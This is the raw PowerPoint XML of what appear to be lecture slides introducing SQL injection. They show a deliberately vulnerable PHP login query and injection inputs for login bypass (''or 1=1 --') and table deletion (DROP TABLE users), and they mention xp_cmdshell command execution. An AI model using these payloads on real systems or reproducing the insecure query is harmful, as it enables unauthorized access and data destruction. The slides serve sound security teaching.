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1"/>
  </p:notesMasterIdLst>
  <p:sldIdLst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287" r:id="rId27"/>
    <p:sldId id="288" r:id="rId28"/>
    <p:sldId id="289" r:id="rId29"/>
    <p:sldId id="290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576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FE343-990A-4D85-94A7-AA089B9FB9CD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3274A-E2EC-46F2-801C-907715D10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4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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE383D48-8F3F-E4AE-1B45-D55240402F0D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25EC6EE0-9141-AD9D-DA2E-E91C122CDD60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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9ADB8BF-8922-ACC8-E469-E39A3CA0541D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80330407-D7CF-3178-021D-E57A06E25A97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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAEB35A3-93A1-E2E0-810F-083EF9D3D511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9F8B8AF1-FEAE-A399-A334-2DF52073644E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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{773CBE81-6B89-E4B4-F41D-1E33864EFAA0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3D8F6F79-7CB2-F254-A974-FCD96B327279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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34A16414-9E66-0A45-79FA-399BBC26FCC7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A53BFB36-D285-C8F8-E396-A38D981E182D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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F923B2C4-A954-2BC4-987D-B3C8A33EBB64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620F3F54-5932-5EE4-6CA3-50001627D505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">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A76B7ADB-EFAB-E908-0478-6E6674AA8E8C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9F4EEDC7-8A25-2251-0CC6-99307017E588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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DB96B70-9B2E-754F-DF70-91BA8979BF73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80237360-4A94-4495-B97A-E816757BA61E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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E030133-7885-4435-CE8E-6186E46EF5F9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9F7A46E3-6E5C-EE33-189D-0CD569CE3410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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43B27270-E327-E197-566B-F40DC06BB565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EDEABBA5-F79E-3E87-697E-6020987DACFC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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95D976C8-B310-985B-1839-881A6DD0729B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9ADC6E4A-D4A2-9EF1-CD7B-287C0A392BE7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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A38F4A6B-5662-C833-F7A0-5312FF41D823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1DE212BA-25BE-CA14-F4E8-C9E2652845A1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However, nothing enforces that you only pass in command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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DDA2C5F-9D3E-FDB9-5882-65DA04631B9B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23FCBAD8-9A4A-DF6A-4356-64F19A6068B6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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0F21C5D-4F1B-3012-4FBC-760E2259548F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1DCA2117-6509-F53B-7BAC-4452CF87E6DD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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBA2F718-7C87-7398-50B0-21DCB9BFAED7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B00E80BE-7953-3CAF-0E98-4269A9F8162B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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A85DE16-D237-86A3-9094-B2B74885FA59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8451CF59-8AAF-B90E-3BA8-83835D350E85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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A17A96A-5820-E662-5622-33837DBFE001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2BCD5415-BAAF-3E8F-0D3D-D1408506DFD0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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC87E4B8-BCDB-5CBD-E7F1-9BA4EBB49BEF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946415EA-F856-BF8D-AFAC-006B8BDDC1DB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Imagine we have a login form on a website that we want to check against a backend SQL database.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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6A08983-4A75-A1A8-7858-3DC7D3839FD3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A3D895C7-FFD9-44E2-D346-D5EC09CE16C2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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{179E51EF-0E99-D335-BE76-6F43EA5941C7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88B1A75A-82C6-3EE2-E63E-87AE53420CF4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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F29E5901-9B3B-8D80-B1B9-2AAE4C11FF41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CEBE6EE6-1A91-2E6B-6102-25ACFED95399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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D09B988-7B44-1478-F1A4-2CA7628E0222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9BC363B9-0534-3A6C-05C7-E95BC9CBA9D6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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5299CEF7-021E-8D28-DC25-521B7FE8F360}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/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62533388-C54D-7464-A50D-6518520B85DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body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altLang="en-US" sz="1800">
                <a:latin typeface="Helvetica Neue" charset="0"/>
                <a:ea typeface="Helvetica Neue" charset="0"/>
                <a:cs typeface="Helvetica Neue" charset="0"/>
              </a:rPr>
              <a:t>Big shift today! Next four lectures are going to be about the web.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53C8E-4B38-2A1C-E371-534D965965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0A6E11-0BF6-FFCB-349F-54A7531CBD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58524-C637-C45E-67C9-29014BF6A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DB1E-E3D2-4A28-9A87-8C707FAA8C3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40056-2149-D14A-6C05-3EC1B229F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34970-BEF2-D1B4-45B2-329A4CF9A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8FC75-3A12-42AD-9F77-3FCE4F85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2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451F7-FB4F-EB62-99AA-857842BBD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2B54D-A613-B1FE-FBC7-E032D6DA3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5AF7E-899C-264E-8222-F24973367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DB1E-E3D2-4A28-9A87-8C707FAA8C3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FCCE6-22EF-7284-9607-180E75C76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5BAEB-FF89-1889-A699-D295181F1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8FC75-3A12-42AD-9F77-3FCE4F85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161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A97140-D01C-73EF-A048-A96E509525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4AFD23-2C5D-4BAD-34D5-2F90813F4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7C2AD-AC6D-91B1-A600-465ED554C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DB1E-E3D2-4A28-9A87-8C707FAA8C3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9C883-E92E-1E01-47F2-FEF909A32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86418-7FE8-B121-D1C5-66AB802D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8FC75-3A12-42AD-9F77-3FCE4F85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84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3"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="228600" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="457200" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="685800" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="800"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="914400" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="800"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1143000" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="800"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="1371600" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="800"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="1600200" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="800"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="1828800" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="8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9BB4AE-3BDD-88C0-1078-4AC15735DA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3A5927-A528-47ED-872B-786EDC2EE7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565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4E6300-DF88-CFE8-3A23-CE9DDF2214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198F1-5ADE-4DFB-BBBF-4C57A538BD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7687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8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8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00"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="457200" indent="0">
              <a:buNone/>
              <a:defRPr sz="900"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="685800" indent="0">
              <a:buNone/>
              <a:defRPr sz="800"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="914400" indent="0">
              <a:buNone/>
              <a:defRPr sz="800"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1143000" indent="0">
              <a:buNone/>
              <a:defRPr sz="800"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="1371600" indent="0">
              <a:buNone/>
              <a:defRPr sz="800"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="1600200" indent="0">
              <a:buNone/>
              <a:defRPr sz="800"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="18288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879D97-2270-3AAE-6D2D-AA399BE927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54C8E-13C7-4949-9450-F68E187B89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352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4550" y="1574800"/>
            <a:ext cx="521335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4100" y="1574800"/>
            <a:ext cx="521335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886CA87-0A5D-2F2B-4FC8-FD139FECE7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3D7E0-E2F3-4330-9D86-07F0A88EF2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424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1681163"/>
            <a:ext cx="5157788" cy="82391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7" y="2505075"/>
            <a:ext cx="515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B3DDE8B-06F1-883B-8A16-B343160EFC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75851C-37F6-4281-8792-1588497EF0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0431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A569FBE-135A-C358-0BA8-A20D612203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8FAC5-547D-4C41-8EF6-94EAE0A557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941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1F1756DD-C57B-35F5-9E7C-014F8A6249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4F470-2123-49D8-AB4D-E9117937D1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270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8408C91-F298-7FDA-B88B-C00C726E4B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C3B9C2-C1CE-4B7D-AC8A-BB631C22AB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57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7BCE2-2F19-E5D2-F17F-89323B1BC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D768C-BC69-87D2-839C-F059D229B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E4739-1A91-D748-D84C-2B253B6F8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DB1E-E3D2-4A28-9A87-8C707FAA8C3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4A1E8-5C93-31BE-F5A1-9990AA950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B2D64-1546-500B-E6E1-A535BCC44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8FC75-3A12-42AD-9F77-3FCE4F85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7553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pPr lvl="0"/>
            <a:endParaRPr lang="en-US" noProof="0">
              <a:sym typeface="Helvetica Neue" panose="02000503000000020004" pitchFamily="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611B136-A03E-FE2A-EDDD-30D79E5574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FB979C-A0C5-4FBB-8A26-AE2EECA665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8415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067A3E-AD4A-5AFC-FCB4-FF7A48F10D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736A0B-455B-42EB-B42B-F12E61273A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01721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1725" y="177800"/>
            <a:ext cx="2625725" cy="6045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4550" y="177800"/>
            <a:ext cx="7800975" cy="6045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426950-DE9F-6B3F-90A5-8EA431A140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5016AD-9506-4EE6-A05B-4635EAFB25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397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FFD9C-2308-BEA2-AE94-78333B795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9D70B2-4912-D973-1F3B-8712E9603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FE634-DE86-8BF4-5BF7-689E143AE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DB1E-E3D2-4A28-9A87-8C707FAA8C3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5CEED-F1A2-F642-8109-68EC23E9A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901FB-9D2F-007F-E23A-F057C4753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8FC75-3A12-42AD-9F77-3FCE4F85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86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562F9-73A2-1503-9278-7C4AE16E7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69D29-6B0D-7BE8-DC31-550810E816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BF93F8-57FA-77E5-BC62-975B56C85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F780EB-2CE8-FF9E-37ED-A6312F8F9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DB1E-E3D2-4A28-9A87-8C707FAA8C3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88F5A7-92BF-FAAD-D27C-10FA7E352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3C4D0-4C6E-3B59-D1A0-A22144A83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8FC75-3A12-42AD-9F77-3FCE4F85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6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C78C9-D9FA-3A41-7417-D00E5B128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D37300-7A30-C24C-AF83-7492F5181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E7928-E845-2206-5EBB-31EF285FA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59F9A3-243B-1FB1-B680-396FEB4CB7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9E9ECC-CBED-61A6-CB98-4285522CE2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2D866E-17BF-B3D4-BFCA-7AEFDA3A7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DB1E-E3D2-4A28-9A87-8C707FAA8C3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9FB0A5-57D9-C874-4BEA-7457A36E9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D6BDCF-79C4-B0DA-F07A-9508737FF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8FC75-3A12-42AD-9F77-3FCE4F85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6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1141D-C70A-A462-C282-2A0EF2B52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3158A2-E801-7023-8E39-92DF0859C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DB1E-E3D2-4A28-9A87-8C707FAA8C3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608338-EC63-1025-8471-404DCBA5E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F49DBA-5397-0937-9BB6-6B4521879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8FC75-3A12-42AD-9F77-3FCE4F85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00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059FF5-11E0-2CBE-4A83-60FFBAA4C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DB1E-E3D2-4A28-9A87-8C707FAA8C3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24E9FA-F1C6-E9A8-1BC4-22088620F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A378E-1656-F3D4-8A2A-AD8AF382F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8FC75-3A12-42AD-9F77-3FCE4F85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1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07C9C-F9A9-DC13-6F4F-57DB2A86B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3DA1C-E23E-2C29-4962-0C1FCDF73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7DE0D-BA7D-D93B-44F4-3FE2E1F38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A56D6-7FCD-2FE7-025A-536B568AF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DB1E-E3D2-4A28-9A87-8C707FAA8C3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75A5C0-301D-0286-BE5B-A525D11A4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EF5FA-E6DD-6400-9462-E7241F6E5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8FC75-3A12-42AD-9F77-3FCE4F85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2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BC3FC-4C46-B6A9-9949-24667AA33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0D99FB-F156-EBF6-A30C-FE4C353F25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CDA7FA-A0E7-2B9A-B89B-7FAEAEBC6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908E3D-94F6-2DA4-18A1-DFE3D2BA7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DB1E-E3D2-4A28-9A87-8C707FAA8C3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92587D-01E4-20C5-9088-D1AE55B89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A8BB7-E911-1C92-3617-6F6E87AE5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8FC75-3A12-42AD-9F77-3FCE4F85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13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060EFF-B69B-1D00-5B7E-F624E2BB5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1A552-2135-FD3B-3B61-AE949B999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AF22C-4421-64E0-19C3-BEB52B46D0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9ADB1E-E3D2-4A28-9A87-8C707FAA8C3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CBA7D-FA70-CE7C-CE84-12619CC4F8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95889-67CA-E8E6-2733-C3F121D80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98FC75-3A12-42AD-9F77-3FCE4F85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7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AE701484-46F2-FC02-8986-7EAFEB7DA52E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="844550" y="177800"/>
            <a:ext cx="105029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Helvetica Neue Medium" charset="0"/>
              </a:rPr>
              <a:t>Click to edit Template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772D6EF1-88CB-F916-242A-117CBAD46402}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="844550" y="1574800"/>
            <a:ext cx="105029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Helvetica Neue" charset="0"/>
              </a:rPr>
              <a:t>Click to edit Template text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="Helvetica Neue" charset="0"/>
              </a:rPr>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="Helvetica Neue" charset="0"/>
              </a:rPr>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="Helvetica Neue" charset="0"/>
              </a:rPr>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" alt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8243AAD-0D09-1792-426A-035427B2E27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 bwMode="auto">
          <a:xfrm>
            <a:off x="5979319" y="6540500"/>
            <a:ext cx="226219" cy="2301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 algn="ctr" eaLnBrk="1">
              <a:defRPr sz="12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fld id="{0B854F12-4687-4002-AE95-948315AFB6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029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12750" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="5600" kern="12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2pPr>
      <a:lvl3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3pPr>
      <a:lvl4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4pPr>
      <a:lvl5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5pPr>
      <a:lvl6pPr marL="2286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6pPr>
      <a:lvl7pPr marL="4572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7pPr>
      <a:lvl8pPr marL="6858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8pPr>
      <a:lvl9pPr marL="9144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9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="317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6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6350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6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952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6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2700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6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1587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6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12573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17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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB2DE264-753E-E7F4-3D26-7930D762EEFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889000" y="2266950"/>
            <a:ext cx="10414000" cy="2324100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="8500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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SQL Injection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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A59DBC47-CE7F-BF81-8B94-CFDE73E2DB40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Bad Input</a:t>
            </a:r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B6F7CA8F-EC48-EE8E-C5B2-472751B8899E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844550" y="1756569"/>
            <a:ext cx="10867232" cy="4540250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/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$u = $_POST['login’]; // </a:t>
            </a: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zakir</a:t>
            </a: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$pp = $_POST['password']; // </a:t>
            </a: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123</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1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'</a:t>
            </a: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$sql = "SELECT id FROM users WHERE uid = '$u' AND pwd = '$p'”;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//     "SELECT id FROM users WHERE uid = 'zakir' AND pwd = '123</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1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'</a:t>
            </a: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'”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$rs = $db-&gt;executeQuery($sql);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 b="1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//    SQL Syntax Error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if $rs.count &gt; 0 {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   // success</a:t>
            </a:r>
            <a:b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</a:b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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FCDABD7-D723-165C-A795-BFF626751695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Malicious Input</a:t>
            </a:r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9D4893CF-3DED-9532-E5F1-1FF3D4CC2A63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844550" y="1756569"/>
            <a:ext cx="10867232" cy="4540250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/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$u = $_POST['login']; // </a:t>
            </a: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zakir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1">
                <a:solidFill>
                  <a:srgbClr val="B516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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1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--</a:t>
            </a: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$pp = $_POST['password']; // </a:t>
            </a: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123</a:t>
            </a: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$sql = "SELECT id FROM users WHERE uid = '$u' AND pwd = '$p'”;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//     "SELECT id FROM users WHERE uid = 'zakir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1">
                <a:solidFill>
                  <a:srgbClr val="5E5E5E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--</a:t>
            </a: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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1">
                <a:solidFill>
                  <a:srgbClr val="5E5E5E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AND pwd…</a:t>
            </a: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”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$rs = $db-&gt;executeQuery($sql);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 b="1">
                <a:solidFill>
                  <a:srgbClr val="0171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//    (No Error)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if $rs.count &gt; 0 {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   // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1">
                <a:solidFill>
                  <a:srgbClr val="0171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Success!</a:t>
            </a:r>
            <a:b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</a:b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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E7A63C3-BE83-C9E6-3980-0B305C59D4F6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No Username Needed!</a:t>
            </a:r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E272B87B-C9D1-0A76-3EE2-B497666A9ED2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844550" y="1756569"/>
            <a:ext cx="10867232" cy="4540250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/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$u = $_POST['login’]; //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1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'or 1=1 --</a:t>
            </a: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$pp = $_POST['password']; // </a:t>
            </a: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123</a:t>
            </a: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$sql = "SELECT id FROM users WHERE uid = '$u' AND pwd = '$p'”;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//     "SELECT id FROM users WHERE uid = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1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'or 1=1 --</a:t>
            </a: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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1">
                <a:solidFill>
                  <a:srgbClr val="5E5E5E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AND pwd…</a:t>
            </a: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”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$rs = $db-&gt;executeQuery($sql);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 b="1">
                <a:solidFill>
                  <a:srgbClr val="0171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//    (No Error)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if $rs.count &gt; 0 {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   // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1">
                <a:solidFill>
                  <a:srgbClr val="0171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Success!</a:t>
            </a:r>
            <a:b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</a:b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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E2EE31C-A35F-FDAE-8C05-0DE6F57DF0E2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Causing Damage</a:t>
            </a:r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E8E31BF0-ECB1-E22B-819F-DB4C0E2B631A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844550" y="1756569"/>
            <a:ext cx="10867232" cy="4540250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/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$u = $_POST[‘login’]; //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1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2100" b="1">
                <a:solidFill>
                  <a:srgbClr val="B516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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" b="1">
                <a:solidFill>
                  <a:srgbClr val="B51600"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>； </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1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DROP TABLE [users] --</a:t>
            </a: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$pp = $_POST['password']; // </a:t>
            </a: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123</a:t>
            </a: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$sql = "SELECT id FROM users WHERE uid = '$u' AND pwd = '$p'”;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//     "SELECT id FROM users WHERE uid = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" b="1">
                <a:solidFill>
                  <a:srgbClr val="B51600"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="SimSun" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>； </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1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DROP TABLE [users]--</a:t>
            </a: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”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$rs = $db-&gt;executeQuery($sql);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 b="1">
                <a:solidFill>
                  <a:srgbClr val="0171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// No Error…(and no more users table) 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if $rs.count &gt; 0 {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// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1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Success!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="210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</a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="210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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C1B24CF-152D-ABB3-48F9-5979DB27C537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MSSQL xp_cmdshell </a:t>
            </a:r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2F9BDF1B-E700-FBCA-1F8D-9F67ED9258D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="844550" y="1756569"/>
            <a:ext cx="10898188" cy="3077369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300"/>
              <a:t>Microsoft SQL server lets you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>run arbitrary system commands</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2300"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
